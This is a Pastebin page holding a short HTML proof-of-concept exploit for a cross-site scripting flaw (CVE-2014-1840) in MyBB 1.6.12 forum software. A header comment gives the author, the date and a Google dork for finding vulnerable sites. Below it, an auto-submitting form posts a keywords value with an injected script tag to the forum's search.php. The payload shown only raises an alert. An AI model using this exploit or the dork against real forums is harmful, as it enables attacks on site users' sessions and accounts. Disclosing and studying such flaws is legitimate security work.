Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <!--
- Exploit-Title: MyBB 1.6.12 POST XSS 0day
- Google-Dork: inurl:index.php intext:Powered By MyBB
- Date: Februrary 2nd of 2014
- Bug Discovered and Exploit Author: Osanda Malith Jayathissa
- Vendor Homepage: http://www.mybb.com
- Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
- Version: 1.6.12 (older versions might be vulnerbale)
- Tested on: Windows 8 64-bit
- Video: https://www.youtube.com/watch?v=67MfgixmWgo
- Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
- CVE: CVE-2014-1840
- -->
- <body>
- <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
- <input type="hidden" name="action" value="do_search" />
- <input type="hidden" name="keywords"
- value="qor'("\2a<script>alert(/XSS/)</script>
- " />
- <script>document.exploit.submit(); </script>
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement